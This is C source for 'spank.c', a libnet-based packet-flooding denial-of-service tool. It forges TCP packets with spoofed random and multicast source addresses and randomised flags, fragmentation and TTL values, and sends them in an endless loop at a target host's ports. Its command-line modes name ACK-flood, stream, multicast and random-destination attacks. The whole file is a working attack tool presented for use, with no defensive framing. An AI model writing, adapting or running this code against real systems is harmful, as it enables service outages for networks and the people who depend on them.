/*
 * spank.c by Liquid Steel [lst @ efnet -- yardley@uiuc.edu]
 * this is a more robust version of the previous raped.c and will 
 * address a few issues and variations on the previous attacks as well as
 * introduce a new attack.  

 * notes: this originally was written to address the ACK flood issue, now
 * it has been rewritten to be a bit more robust and play with some params
 * that seemed to break things when I was testing
 * before. 
 *
 * requires:  libnet 0.99g or above (http://www.packetfactory.net)
 *
 * compile: gcc -Wall `libnet-config --defines` spank.c -o spank \
 * `libnet-config --libs`
 */

#include <stdio.h>
#include <unistd.h>
#include <libnet.h>

int ports, s;
char *dsthost;
u_char *packet;
unsigned int portarray[255];

struct options {
   unsigned long dst, src;
   unsigned long seqn, ackn;
   unsigned short flags;
   unsigned short ttl;
   unsigned short winsize;
   unsigned short dport, sport;
   unsigned short ident;
   unsigned short frag;
   unsigned char tos;
};

struct options opt;

int isrand = 0, ismult = 0;
int change = 0, change2 = 0;
int stream = 0, whocares = 0, local = 0;


int frag_array[4] = {IP_RF, IP_DF, IP_MF, IP_OFFMASK};
int tos_array[4] = {IPTOS_MINCOST, IPTOS_RELIABILITY, IPTOS_THROUGHPUT, 
                    IPTOS_LOWDELAY};
int flag_array[6] = {TH_FIN, TH_SYN, TH_RST, TH_PUSH, TH_ACK, TH_URG};

void
abort (void)
{
   printf (":: exiting...\n\n");
   libnet_close_raw_sock(s);
   libnet_destroy_packet(&packet);
   exit (EXIT_SUCCESS);
}

void
banner (void)
{
   printf ("--------------------\n");
   printf ("::                ::\n");
   printf (":: spank.c by lst ::\n");
   printf ("::                ::\n");
   printf ("--------------------\n");
}

void
usage (char *progname)
{
   printf ("usage: %s [-lmnorsw] <dst> <ports>\n", progname);
   printf ("\t-l\t- local multicast havoc\n");
   printf ("\t-m\t- multicast variation attack\n");
   printf ("\t-n\t- multicast variation attack with random args\n");
   printf ("\t-o\t- original raped attack\n");
   printf ("\t-r\t- pure random attack on dst\n");
   printf ("\t-s\t- original stream attack\n");
   printf ("\t-w\t- whocares attack (random dest w/ variable multicast)\n");
   printf ("\t<dst>\t- destination host (not needed for -l or -w)\n");
   printf ("\t<ports>\t- ports to flood\n\n");
   exit (1);
}

void
parse_args (int argc, char *argv[])
{
   int cnt, i;
        
   if (argc < 2)
   usage (argv[0]);

   if ((cnt = getopt(argc, argv, "lmnorsw")) != -1)
   {
      switch(cnt) {
         case 'l':
            local = 1;
            ismult = isrand = 1;
            change = 1;
            break;

         case 'm':
            opt.flags = TH_ACK;
            ismult = 1;
            break;
   
         case 'n':
            ismult = isrand = 1;
            break;
   
         case 'o':
            opt.flags = TH_ACK;
            break;
      
         case 'r':
            change = 1;
            ismult = isrand = 1;
            break;
         
         case 's':
            stream = 1;
            break;
        
         case 'w':
            whocares = 1;
            change = change2 = 1;
            ismult = isrand = 1;
            break;
       
         default:
            change = 1;
            ismult = 1;
            isrand = 1;
            break;
      }
                
      if ((whocares) || (local))
      {
         for (i = 2; i < argc; i++)
         {
            ports++;
            portarray[ports] = atoi (argv[i]);
         }
      }
      
      else
      {
         if (argc < 3) usage(argv[0]);
                        
         dsthost = argv[2];
         for (i = 3; i < argc; i++)
         {
            ports++;
            portarray[ports] = atoi (argv[i]);
         }
      }
   }
   
   else
   {
      usage (argv[0]);
      exit(EXIT_FAILURE);
   }
}

int
main (int argc, char *argv[])
{
   int i, loop;
   /* no payload yet */
   int size = LIBNET_PACKET;

   opt.seqn = opt.ackn = opt.flags = opt.dport = opt.sport = opt.frag = 0;
   opt.ttl = 255;
   opt.winsize = 16384;
   opt.tos = 0x08;      
        
   signal (SIGINT, (void (*)()) abort);

   srand(time(NULL) + getpid());
   srandom(time(NULL) + getpid());

   banner ();

   parse_args (argc, argv);

   if (!whocares)
   {
      if (!local)
      {
         if (!(opt.dst = libnet_name_resolve(dsthost, LIBNET_RESOLVE)))
         {
            libnet_error(LIBNET_ERR_FATAL, 
                         ":: invalid destination IP address: %s\n", dsthost);

            exit (1);
          }
 
         printf (":: destination host - %s\n", dsthost);
      }

      else printf (":: destination host - local\n");
   }
   else printf (":: destination host - whocares\n");
                
  printf (":: destination port(s)");
  for (i = 1; i < ports + 1; i++) printf (" - %d", portarray[i]);
  putchar('\n');

  if (!libnet_init_packet(size, &packet))
     libnet_error(LIBNET_ERR_FATAL, ":: libnet_init_packet failed\n");
        
  if ((s = libnet_open_raw_sock(IPPROTO_RAW)) == -1)
     libnet_error(LIBNET_ERR_FATAL, ":: cannot open socket.\n");

  printf (":: spanking...\n");
  printf (":: press ^C to end...\n");

  for (;;)
  {
     for (i = 1; i < ports + 1; i++)
     {
        if (whocares) change2 = random() & 1;

        if (ismult)
        {
           opt.src = ((224 + rand() % 239) << 24) + 
                     ((rand() % 254) << 16) + ((rand() % 254) << 8) +
                     (rand() % 254);;

           if (local)
           {
              opt.dst = ((224 + rand() % 239) << 24) + (0 << 16) + (
                        0 << 8) + (rand() % 5);
           }
           
           else
           {
              if (change2)
              {
                 opt.dst = ((224 + rand() % 239) << 24) + 
                           ((rand() % 254) << 16) + ((rand() % 254) << 8) + 
                           (rand() % 254);
              }
              else opt.dst = rand();
           }
        }
        
        else
        { 
           opt.src = rand();

           if (local)
           {
              opt.dst = ((224 + rand() % 239) << 24) + 
              (0 << 16) + (0 << 8) + (rand() % 5);
           }

           else
           {
              if (change2)
              {
                 opt.dst = ((224 + rand() % 239) << 24) + 
                 ((rand() % 254) << 16) + ((rand() % 254) << 8) +
                 (rand() % 254);
              }

              else opt.dst = rand();
           }
        }
                        
        if (isrand)
        {
           loop = rand() % 5;
           for (i=0;i<=loop;i++) opt.flags |= flag_array[rand() % 5];
                                
           opt.frag = frag_array[rand() % 3];
           opt.ackn = random();
           opt.sport = 1024 + rand () % 32000;
           opt.tos = tos_array[rand() % 3];
           opt.ttl = rand() % 255;
           opt.winsize = rand() % 32000;
           if (change) ismult = random() & 01;
         }

         opt.ident = random(), opt.seqn = random();

         if (!stream) opt.ackn = random();
                        
         if (portarray[i] == 0) opt.dport = rand() % 1024;
         else opt.dport = portarray[i];
                        
         libnet_build_ip(TCP_H, opt.tos, opt.ident, opt.frag, opt.ttl,
                         IPPROTO_TCP, opt.src, opt.dst, NULL, 0, packet);

         libnet_build_tcp(opt.sport, opt.dport, opt.seqn, opt.ackn, 
                          opt.flags, opt.winsize, 0, NULL, 0, 
                          packet + IP_H);
                        
         if (libnet_do_checksum(packet, IPPROTO_TCP, TCP_H) == -1) 
            libnet_error(LIBNET_ERR_FATAL, ":: libnet_do_checksum failed\n");
                        
         libnet_write_ip(s, packet, size);
      }
   } 

   return 0;
}

